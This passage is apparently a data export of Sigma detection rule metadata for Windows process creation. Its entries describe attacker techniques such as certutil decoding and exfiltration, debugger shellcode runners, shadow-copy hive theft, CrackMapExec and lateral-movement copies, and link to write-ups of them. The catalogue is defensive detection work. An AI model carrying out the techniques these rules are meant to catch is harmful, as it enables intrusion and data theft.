- "uuid": "737e618a-a410-49b5-bec3-9e55ff7fbc15",
- "value": "Suspicious Calculator Usage"
- },
- {
- "description": "Launch 64-bit shellcode from a debugger script file using cdb.exe.",
- "meta": {
- "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali",
- "creation_date": "2019/10/26",
- "falsepositive": [
- "Legitimate use of debugging tools"
- ],
- "filename": "proc_creation_win_susp_cdb.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/",
- "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html",
- "https://twitter.com/nas_bench/status/1534957360032120833",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cdb.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1106",
- "attack.defense_evasion",
- "attack.t1218",
- "attack.t1127"
- ]
- },
- "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2",
- "value": "Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner"
- },
- {
- "description": "Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code",
- "meta": {
- "author": "Florian Roth, juju4, keepwatch",
- "creation_date": "2019/01/16",
- "falsepositive": [
- "False positives depend on scripts and administrative tools used in the monitored environment"
- ],
- "filename": "proc_creation_win_susp_certutil_command.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/JohnLaTwC/status/835149808817991680",
- "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/",
- 
"https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/",
- "https://twitter.com/egre55/status/1087685529016193025",
- "https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1140",
- "attack.command_and_control",
- "attack.t1105",
- "attack.s0160",
- "attack.g0007",
- "attack.g0010",
- "attack.g0045",
- "attack.g0049",
- "attack.g0075",
- "attack.g0096"
- ]
- },
- "uuid": "e011a729-98a6-4139-b5c4-bf6f6dd8239a",
- "value": "Suspicious Certutil Command Usage"
- },
- {
- "description": "Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration",
- "meta": {
- "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community",
- "creation_date": "2019/02/24",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_certutil_encode.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
- "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027"
- ]
- },
- "uuid": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a",
- "value": "Certutil Encode"
- },
- {
- "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/01/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_char_in_cmd.yml",
- "level": "high",
- 
"logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027"
- ]
- },
- "uuid": "e0552b19-5a83-4222-b141-b36184bb8d79",
- "value": "Obfuscated Command Line Using Special Unicode Characters"
- },
- {
- "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts",
- "meta": {
- "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)",
- "creation_date": "2019/10/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_child_process_as_system_.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
- "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
- "https://github.com/antonioCoco/RogueWinRM",
- "https://twitter.com/Cyb3rWard0g/status/1453123054243024897",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1134.002"
- ]
- },
- "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d",
- "value": "Suspicious Child Process Created as System"
- },
- {
- "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network 
resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/12/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_cipher.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cipher.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1485"
- ]
- },
- "uuid": "4b046706-5789-4673-b111-66f25fe99534",
- "value": "Overwrite Deleted Data with Cipher"
- },
- {
- "description": "Detects suspicious process that use escape characters",
- "meta": {
- "author": "juju4",
- "creation_date": "2018/12/11",
- "falsepositive": [
- "False positives depend on scripts and administrative tools used in the monitored environment"
- ],
- "filename": "proc_creation_win_susp_cli_escape.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/vysecurity/status/885545634958385153",
- "https://twitter.com/Hexacorn/status/885553465417756673",
- "https://twitter.com/Hexacorn/status/885570278637678592",
- "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html",
- "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1140"
- ]
- },
- "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd",
- "value": "Suspicious Commandline Escape"
- },
- {
- 
"description": "Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/01",
- "falsepositive": [
- "Some FP is expected with some installers"
- ],
- "filename": "proc_creation_win_susp_clsid_foldername.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/Kostastsale/status/1565257924204986369",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027"
- ]
- },
- "uuid": "90b63c33-2b97-4631-a011-ceb0f47b77c3",
- "value": "Suspicious CLSID Folder Name In Suspicious Locations"
- },
- {
- "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/12/05",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_cmd.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/Wh04m1001/SysmonEoP",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.defense_evasion",
- "attack.execution",
- "attack.t1059"
- ]
- },
- "uuid": "178e615d-e666-498b-9630-9ed363038101",
- "value": "Suspicious Elevated System Shell"
- },
- {
- "description": "Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. 
This could be indicative of adversary lateral movement.",
- "meta": {
- "author": "Tim Rauch",
- "creation_date": "2022/09/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_cmd_exectution_via_wmi.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_exectution_via_wmi.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047"
- ]
- },
- "uuid": "e31f89f7-36fb-4697-8ab6-48823708353b",
- "value": "Suspicious Cmd Execution via WMI"
- },
- {
- "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)",
- "meta": {
- "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community",
- "creation_date": "2019/01/16",
- "falsepositive": [
- "High"
- ],
- "filename": "proc_creation_win_susp_cmd_http_appdata.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100",
- "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.003",
- "attack.t1059.001",
- "attack.command_and_control",
- "attack.t1105"
- ]
- },
- "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3",
- "value": "Command Line Execution with Suspicious URL and AppData Strings"
- },
- {
- "description": "Detects a copy execution that targets a shadow copy (sometimes used to copy registry hives 
that are in use)",
- "meta": {
- "author": "Max Altgelt, Tobias Michalski",
- "creation_date": "2021/08/09",
- "falsepositive": [
- "Some rare backup scenarios"
- ],
- "filename": "proc_creation_win_susp_cmd_shadowcopy_access.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
- "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1490"
- ]
- },
- "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1",
- "value": "Copy from Volume Shadow Copy"
- },
- {
- "description": "Detects use of chcp to look up the system locale value as part of host discovery",
- "meta": {
- "author": "_pete_0, TheDFIRReport",
- "creation_date": "2022/02/21",
- "falsepositive": [
- "During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section"
- ],
- "filename": "proc_creation_win_susp_codepage_lookup.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1614.001"
- ]
- },
- "uuid": "7090adee-82e2-4269-bd59-80691e7c6338",
- "value": "CHCP CodePage Locale Lookup"
- },
- {
- "description": "Detects a code page switch in command line or batch scripts to a rare language",
- "meta": {
- "author": "Florian 
Roth, Jonhnathan Ribeiro, oscd.community",
- "creation_date": "2019/10/14",
- "falsepositive": [
- "Administrative activity (adjust code pages according to your organisation's region)"
- ],
- "filename": "proc_creation_win_susp_codepage_switch.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers",
- "https://twitter.com/cglyer/status/1183756892952248325",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml"
- ],
- "tags": [
- "attack.t1036",
- "attack.defense_evasion"
- ]
- },
- "uuid": "c7942406-33dd-4377-a564-0f62db0593a3",
- "value": "Suspicious Code Page Switch"
- },
- {
- "description": "Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/04/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_commandline_chars.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "2c0d2d7b-30d6-4d14-9751-7b9113042ab9",
- "value": "Suspicious Characters in CommandLine"
- },
- {
- "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. 
seen in PsExec-like tools",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/11/11",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_command_flag_pattern.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "50d66fb0-03f8-4da0-8add-84e77d12a020",
- "value": "Suspicious RunAs-Like Flag Combination"
- },
- {
- "description": "Detects suspicious command line arguments of common data compression tools",
- "meta": {
- "author": "Florian Roth, Samir Bousseaden",
- "creation_date": "2019/10/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_compression_params.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/SBousseaden/status/1184067445612535811",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml"
- ],
- "tags": [
- "attack.collection",
- "attack.t1560.001"
- ]
- },
- "uuid": "27a72a60-7e5e-47b1-9d17-909c9abafdcd",
- "value": "Suspicious Compression Tool Parameters"
- },
- {
- "description": "Detects the conhost execution as parent process. 
Can be used to evaded defense mechanism.",
- "meta": {
- "author": "omkar72",
- "creation_date": "2020/10/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_conhost.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1202"
- ]
- },
- "uuid": "7dc2dedd-7603-461a-bc13-15803d132355",
- "value": "Conhost Parent Process Executions"
- },
- {
- "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/04/04",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_conhost_option.yml",
- "level": "informational",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29",
- "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1202"
- ]
- },
- "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539",
- "value": "Suspicious Conhost Legacy Option"
- },
- {
- "description": "Detects a suspicious process pattern found in CVE-2021-40444 exploitation",
- "meta": {
- "author": "@neonprimetime, Florian Roth",
- "creation_date": "2021/09/08",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_control_cve_2021_40444.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- 
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444",
- "https://twitter.com/neonprimetime/status/1435584010202255375",
- "https://www.joesandbox.com/analysis/476188/1/iochtml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ]
- },
- "uuid": "894397c6-da03-425c-a589-3d09e7d1f750",
- "value": "CVE-2021-40444 Process Pattern"
- },
- {
- "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2017/04/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_control_dll_load.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/rikvduijn/status/853251879320662017",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819",
- "value": "Suspicious Control Panel DLL Load"
- },
- {
- "description": "Detects a suspicious copy command to or from an Admin share or remote",
- "meta": {
- "author": "Florian Roth, oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali",
- "creation_date": "2019/12/30",
- "falsepositive": [
- "Administrative scripts"
- ],
- "filename": "proc_creation_win_susp_copy_lateral_movement.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/SBousseaden/status/1211636381086339073",
- "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view",
- "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html",
- 
"https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.collection",
- "attack.exfiltration",
- "attack.t1039",
- "attack.t1048",
- "attack.t1021.002"
- ]
- },
- "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900",
- "value": "Copy from Admin Share"
- },
- {
- "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n",
- "meta": {
- "author": "Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)",
- "creation_date": "2020/07/03",
- "falsepositive": [
- "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)",
- "When cmd.exe and xcopy.exe are called directly",
- "When the command contains the keywords but not in the correct order"
- ],
- "filename": "proc_creation_win_susp_copy_system32.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120",
- "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.003"
- ]
- },
- "uuid": 
"fff9d2b7-e11c-4a69-93d3-40ef66189767",
- "value": "Suspicious Copy From or To System32"
- },
- {
- "description": "Detects suspicious command lines used in Covenant luanchers",
- "meta": {
- "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community",
- "creation_date": "2020/06/04",
- "falsepositive": "No established falsepositives",
- "filename": "proc_creation_win_susp_covenant.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://posts.specterops.io/covenant-v0-5-eee0507b85ba",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_covenant.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.defense_evasion",
- "attack.t1059.001",
- "attack.t1564.003"
- ]
- },
- "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2",
- "value": "Covenant Launcher Indicators"
- },
- {
- "description": "Detect various execution methods of the CrackMapExec pentesting framework",
- "meta": {
- "author": "Thomas Patzke",
- "creation_date": "2020/05/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_crackmapexec_execution.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/byt3bl33d3r/CrackMapExec",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_execution.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047",
- "attack.t1053",
- "attack.t1059.003",
- "attack.t1059.001",
- "attack.s0106"
- ]
- },
- "uuid": "058f4380-962d-40a5-afce-50207d36d7e2",
- "value": "CrackMapExec Command Execution"
- },
- {
- "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/02/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": 
"proc_creation_win_susp_crackmapexec_flags.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local",
- "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
- "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz",
- "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c",
- "value": "CrackMapExec Command Line Flags"
- },
- {
- "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.",
- "meta": {
- "author": "Thomas Patzke",
- "creation_date": "2020/05/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/byt3bl33d3r/CrackMapExec",
- "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.defense_evasion",
- "attack.t1027.005"
- ]
- },
- "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf",
- "value": "CrackMapExec PowerShell Obfuscation"
- },
- {
- "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/02/11",
- "falsepositive": [
- "Unknown"
- ],
- "filename": 
"proc_creation_win_susp_csc.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/SBousseaden/status/1094924091256176641",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.005",
- "attack.t1059.007",
- "attack.defense_evasion",
- "attack.t1218.005",
- "attack.t1027.004"
- ]
- },
- "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee",
- "value": "Suspicious Parent of Csc.exe"
- },
- {
- "description": "Adversaries may abuse Visual Basic (VB) for execution",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/01/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_cscript_vbs.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cscript_vbs.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.005"
- ]
- },
- "uuid": "23250293-eed5-4c39-b57a-841c8933a57d",
- "value": "Cscript Visual Basic Script Execution"
- },
- {
- "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. 
AppData)",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/08/24",
- "falsepositive": [
- "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897",
- "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962"
- ],
- "filename": "proc_creation_win_susp_csc_folder.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/",
- "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
- "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/",
- "https://twitter.com/gN3mes1s/status/1206874118282448897",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027.004"
- ]
- },
- "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4",
- "value": "Suspicious Csc.exe Source File Folder"
- },
- {
- "description": "Detects the use of the lesser known remote execution tool named CsExec (a PsExec alternative)",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/08/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_csexec.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/malcomvetter/CSExec",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csexec.yml"
- ],
- "tags": [
- "attack.resource_development",
- "attack.t1587.001",
- "attack.execution",
- "attack.t1569.002"
- ]
- },
- "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31",
- "value": "CsExec Remote 
Execution Tool Usage" - }, - { - "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", - "meta": { - "author": "Konstantin Grishchenko, oscd.community", - "creation_date": "2020/10/17", - "falsepositive": [ - "Legitimate usage by software developers" - ], - "filename": "proc_creation_win_susp_csi.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", - "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", - "https://twitter.com/Z3Jpa29z/status/1317545798981324801", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml" - ], - "tags": [ - "attack.execution", - "attack.t1072", - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e", - "value": "Suspicious Csi.exe Usage" - }, - { - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali (updated)", - "creation_date": "2020/07/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_curl_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/max_mal_/status/1542461200797163522", - "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", - 
